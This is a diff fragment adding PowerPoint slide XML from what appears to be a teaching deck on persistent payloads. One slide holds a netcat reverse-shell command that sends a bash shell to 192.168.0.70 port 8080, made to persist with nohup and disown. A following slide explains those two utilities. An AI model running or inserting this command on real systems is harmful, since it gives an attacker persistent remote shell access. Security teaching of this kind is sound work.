+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01868B80-3B18-4D68-8003-75A63006D933}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>nohup</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t> </a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>nc</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t> -e /bin/bash 192.168.0.70 8080 &amp; disown; exit</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2301024816"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:sld>
+</file>
+
+<file path=ppt/slides/slide9.xml><?xml version="1.0" encoding="utf-8"?>
+<p:sld xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name=""/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="2" name="Title 1">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{082D2187-4EE3-4414-9EE8-A1DFD665686A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="title"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>Persistent payload 1 explained</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="3" name="Content Placeholder 2">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01868B80-3B18-4D68-8003-75A63006D933}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr/>
+        <p:txBody>
+          <a:bodyPr/>
+          <a:lstStyle/>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0" err="1"/>
+              <a:t>Nohup</a:t>
+            </a:r>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t> – No hang up</a:t>
+            </a:r>
+          </a:p>
+          <a:p>
+            <a:r>
+              <a:rPr lang="en-GB" dirty="0"/>
+              <a:t>Disown – Detach from parent process preventing the process to be frozen up.</a:t>
+            </a:r>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2634681976"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
